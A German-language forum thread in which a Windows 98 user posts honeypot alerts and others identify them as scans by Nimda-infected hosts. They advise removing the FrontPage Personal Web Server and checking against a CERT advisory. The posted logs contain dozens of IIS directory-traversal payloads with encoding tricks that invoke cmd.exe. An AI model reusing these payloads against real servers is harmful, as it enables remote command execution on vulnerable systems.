Viren, Spyware, Datenschutz 11.258 Themen, 94.807 Beiträge

Verfolgung starten Optionen

Meldungen von NFR Back Officer Friendly

fbe / 9 Antworten / Baumansicht Nickles

Ich habe auf meienm Rechner (W98)NFR installiert. Seitdem ich auf einer 2. Partition W2000 laufen habe bekomme ich, wenn ich unter W98 im Internet bin, die folgenden Meldungen von NFR:
Sun Oct 21 16:21:57 HTTP request from 62.158.220.148: GET /scripts/root.exe?/c+dir
Sun Oct 21 16:22:00 HTTP request from 62.158.220.148: GET /MSADC/root.exe?/c+dir
Sun Oct 21 16:22:01 HTTP request from 62.158.220.148: GET /c/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:02 HTTP request from 62.158.220.148: GET /d/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:02 HTTP request from 62.158.220.148: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:03 HTTP request from 62.158.220.148: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:05 HTTP request from 62.158.220.148: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:06 HTTP request from 62.158.220.148: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:07 HTTP request from 62.158.220.148: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:07 HTTP request from 62.158.220.148: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:09 HTTP request from 62.158.220.148: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:10 HTTP request from 62.158.220.148: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:11 HTTP request from 62.158.220.148: GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:12 HTTP request from 62.158.220.148: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:14 HTTP request from 62.158.220.148: GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:22:16 HTTP request from 62.158.220.148: GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:27:57 HTTP request from 62.95.18.50: GET /scripts/root.exe?/c+dir
Sun Oct 21 16:27:59 HTTP request from 62.95.18.50: GET /MSADC/root.exe?/c+dir
Sun Oct 21 16:28:03 HTTP request from 62.95.18.50: GET /c/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:08 HTTP request from 62.95.18.50: GET /d/winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:08 HTTP request from 62.95.18.50: GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:09 HTTP request from 62.95.18.50: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:14 HTTP request from 62.95.18.50: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:15 HTTP request from 62.95.18.50: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:17 HTTP request from 62.95.18.50: GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:18 HTTP request from 62.95.18.50: GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:19 HTTP request from 62.95.18.50: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:24 HTTP request from 62.95.18.50: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:28 HTTP request from 62.95.18.50: GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:29 HTTP request from 62.95.18.50: GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:30 HTTP request from 62.95.18.50: GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
Sun Oct 21 16:28:31 HTTP request from 62.95.18.50: GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Weiß jemand was die Meldungen zu bedeuten haben??

Vielen Dank
Fbe

bei Antwort benachrichtigen
Anonym fbe „Meldungen von NFR Back Officer Friendly“
Optionen

Das sind ein paar Nimda infizierte Rechner, die Anschluss suchen...

Was mich interessieren würden, was macht man mit den Rechnern -
bzw. den Leuten, denen die Rechner gehören. Ich dachte eigentlich,
das hört von selbst auf, aber dem ist wohl nicht so...

mfg. j.

bei Antwort benachrichtigen
fbe Nachtrag zu: „Meldungen von NFR Back Officer Friendly“
Optionen

Danke ! ich habe mir schon so etwas gedacht. Frage ist allerdings warum tritt das erst auf nachdem es eine W2000 Partition gibt??
Geht Nimda nur auf W2000 Rechner??

MfG Fbe

bei Antwort benachrichtigen
Anonym fbe „Danke ! ich habe mir schon so etwas gedacht. Frage ist allerdings warum tritt...“
Optionen

Weil jetzt ein IIS bei Dir läuft ? (Keine Ahnung, ich verstehe nur
sehr wenig von W2K)

mfg. j.

bei Antwort benachrichtigen
(Anonym) fbe „Meldungen von NFR Back Officer Friendly“
Optionen

sieht nach einem Serverlog aus....

bei Antwort benachrichtigen
;o) fbe „Meldungen von NFR Back Officer Friendly“
Optionen

ich vermute mal, daß du mit win2000 den iis mitinstalliert hast, da nimda netzbereiche nach webservern abscannt und bei denen anklopft um sich einzunisten. starte mal win2000, gehe auf start, ausführen, gib cmd ein und in der eingabeaufforderung gin "netstat -a" ein (ohne anführungszeichen). erscheint dort an deiner ip/deinem rechnernamen ein port 80, dann solltest du schleunigst den IIS wieder deinstallieren und mal nach einer root.exe suchen.

bei Antwort benachrichtigen
fbe ;o) „ich vermute mal, daß du mit win2000 den iis mitinstalliert hast, da nimda...“
Optionen

IIS ist m. E. unter W2k nicht installiert. Zumindest kann ich nichts unter Systemsteuerung>Verwaltung finden. Netstat -a zeigt unter W2k keinen Port 80 an wenn eine Internet Verbindung besteht.
Unter W98 bringt netstat -a bei bestehender Verbindung einen Port 80.
Wie kann man unter W98 feststellen ob IIS läuft? Unter W98 ist FP2000 installiert.
Die Medungen tauchen auf wenn ich unter W98 im Netz bin.

MfG Fbe

bei Antwort benachrichtigen
;o) fbe „IIS ist m. E. unter W2k nicht installiert. Zumindest kann ich nichts unter...“
Optionen

aha, da liegt das problem. FP installiert standardmäßig den personal webserver mit. dieser ist zwar normalerweise nicht anfällig für nimda, aber trotzdem alles andere als sicher. mein tipp: runter damit. wahrscheinlich über die setuproutine von frontpage.

bei Antwort benachrichtigen
fbe Nachtrag zu: „Meldungen von NFR Back Officer Friendly“
Optionen

Ich habe die Platte (C. + D:) gemäß den Angaben im CERT Advisory Bericht http://www.cert.org/advisories/CA-2001-26.html durchsucht und nichts gefunden. Auch nach einem Download und Ausführen von http://www.fsecure.com/v-descs/nimda.html wird auf beiden Partitionen nichts gefunden. Ich gehe also davon aus dass BOF die Angriffe meldet aber nicht durchlässt. Oder liege ich da falsch??

Fbe

bei Antwort benachrichtigen
;o) fbe „Ich habe die Platte C. D: gemäß den Angaben im CERT Advisory Bericht...“
Optionen

wenn du den personal webserver installiert hast, und nicht den IIS, dann brauchst du eh keine sorge über nimda und webserver zu haben, da nimda nur den IIS befällt. eine infektion über den browser ist alllerdings auf jedem win-system möglich, aber das scheint dann bei dir ja nicht passiert zu sein.

bei Antwort benachrichtigen